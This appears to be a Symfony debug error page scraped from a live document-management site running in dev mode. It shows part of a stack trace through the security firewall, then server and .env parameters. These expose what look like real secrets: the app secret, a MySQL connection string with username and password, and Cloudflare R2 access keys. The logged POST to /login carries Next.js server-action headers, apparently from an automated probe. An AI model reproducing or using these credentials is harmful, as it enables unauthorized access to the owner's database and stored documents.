    "function" => "executeAuthenticators"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-http/Firewall/AuthenticatorManagerListener.php"
    "line" => 38
    "function" => "authenticateRequest"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticatorManagerListener.php"
    "line" => 58
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Firewall\AuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php"
    "line" => 46
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-bundle/Security/LazyFirewallContext.php"
    "line" => 70
    "function" => "authenticate"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php"
    "line" => 94
    "function" => "authenticate"
    "class" => "Symfony\Bundle\SecurityBundle\Security\LazyFirewallContext"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-http/Firewall.php"
    "line" => 93
    "function" => "callListeners"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 115
    "function" => "onKernelRequest"
    "class" => "Symfony\Component\Security\Http\Firewall"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 206
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 56
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 126
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 159
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 76
    "function" => "handleRaw"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/http-kernel/Kernel.php"
    "line" => 193
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php"
    "line" => 35
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\Kernel"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/autoload_runtime.php"
    "line" => 32
    "function" => "run"
    "class" => "Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/index.php"
    "line" => 5
    "args" => [
      "/home/assuifaj/aksamassurancesgdocs.com/vendor/autoload_runtime.php"
    ]
    "function" => "require_once"
  ]
]

Flashes

Flashes

No flash messages were created.

Server Parameters

Server Parameters

Defined in .env

Key Value
APP_DEBUG
"1"
APP_ENV
"dev"
APP_SECRET
"5f8a546366d29a70874d26840557392a"
APP_SHARE_DIR
"var/share"
CORS_ALLOW_ORIGIN
"^https?://(localhost|127\.0\.0\.1)(:[0-9]+)?$"
DATABASE_URL
"mysql://assuifaj_doc_aksam:assuifaj_aksamdoc_docaksam26@127.0.0.1:3306/assuifaj_docmanager?serverVersion=8.0.32&charset=utf8mb4"
DEFAULT_URI
"http://aksamassurancesgdocs.com"
MAILER_DSN
"smtp://localhost:1025"
MAILER_FROM
"noreply@aksamassurancesgdocs.com"
MESSENGER_TRANSPORT_DSN
"doctrine://default?auto_setup=0"
R2_ACCESS_KEY_ID
"4f69a47d341d210943a1010d816c6dea"
R2_BUCKET
"docmanager"
R2_ENDPOINT
"https://86c8bf1865cfe1759d0f04ea52b719fe.r2.cloudflarestorage.com"
R2_PUBLIC_URL
"https://pub-137722b1c3fe4094b3d4ae9e865cd1d1.r2.dev"
R2_SECRET_ACCESS_KEY
"ee46516734b760b2afea3c91877a55758101f2863c186b26520e5a1446de945d"

Defined as regular env variables

Key Value
APP_PROJECT_DIR
"/home/assuifaj/aksamassurancesgdocs.com"
APP_RUNTIME
"Symfony\Component\Runtime\SymfonyRuntime"
APP_RUNTIME_OPTIONS
[
  "project_dir" => "/home/assuifaj/aksamassurancesgdocs.com"
]
CONTENT_LENGTH
"748"
CONTENT_TYPE
"multipart/form-data; boundary=--------WebKitFormBoundary0152c24414474347"
DOCUMENT_ROOT
"/home/assuifaj/aksamassurancesgdocs.com"
HTTPS
"on"
HTTP_ACCEPT
"*/*"
HTTP_ACCEPT_ENCODING
"gzip, deflate"
HTTP_COOKIE
"PHPSESSID=54f1c1af22975ce1a1f2edb0a3a4e597; main_deauth_profile_token=f51900; sf_redirect=%7B%22token%22%3A%22f51900%22%2C%22route%22%3A%22app_home%22%2C%22method%22%3A%22GET%22%2C%22controller%22%3A%7B%22class%22%3A%22App%5C%5CController%5C%5CHomeController%22%2C%22method%22%3A%22index%22%2C%22file%22%3A%22%5C%2Fhome%5C%2Fassuifaj%5C%2Faksamassurancesgdocs.com%5C%2Fsrc%5C%2FController%5C%2FHomeController.php%22%2C%22line%22%3A12%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D"
HTTP_HOST
"www.aksamassurancesgdocs.com"
HTTP_NEXT_ACTION
"x"
HTTP_USER_AGENT
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
HTTP_X_FORWARDED_FOR
"13.53.192.211"
HTTP_X_FORWARDED_PROTO
"https"
HTTP_X_HTTPS
"on"
HTTP_X_NEXTJS_REQUEST_ID
"6e6f6d6b"
PATH
"/usr/local/bin:/bin:/usr/bin"
PHP_SELF
"/index.php"
PROXY_REMOTE_ADDR
"198.177.120.57"
QUERY_STRING
""
REDIRECT_REQUEST_METHOD
"POST"
REDIRECT_STATUS
"200"
REDIRECT_URL
"/login"
REMOTE_ADDR
"13.53.192.211"
REMOTE_PORT
"41322"
REQUEST_METHOD
"POST"
REQUEST_SCHEME
"https"
REQUEST_TIME
1773737450
REQUEST_TIME_FLOAT
1773737450.5588
REQUEST_URI
"/login"
SCRIPT_FILENAME
"/home/assuifaj/aksamassurancesgdocs.com/index.php"
SCRIPT_NAME
"/index.php"
SCRIPT_URI
"https://www.aksamassurancesgdocs.com/login"
SCRIPT_URL
"/login"
SERVER_ADDR
"198.177.120.58"
SERVER_ADMIN
"webmaster@aksamassurancesgdocs.com.assurance-flotte-entreprise.fr"
SERVER_NAME
"www.aksamassurancesgdocs.com"
SERVER_PORT
"443"
SERVER_PROTOCOL
"HTTP/1.1"
SERVER_SOFTWARE
"LiteSpeed"
SYMFONY_DOTENV_PATH
"/home/assuifaj/aksamassurancesgdocs.com/.env"
SYMFONY_DOTENV_VARS
"APP_ENV,APP_DEBUG,APP_SECRET,APP_SHARE_DIR,DEFAULT_URI,DATABASE_URL,MESSENGER_TRANSPORT_DSN,MAILER_DSN,MAILER_FROM,CORS_ALLOW_ORIGIN,R2_ACCESS_KEY_ID,R2_SECRET_ACCESS_KEY,R2_BUCKET,R2_ENDPOINT,R2_PUBLIC_URL"
X-LSCACHE
"on"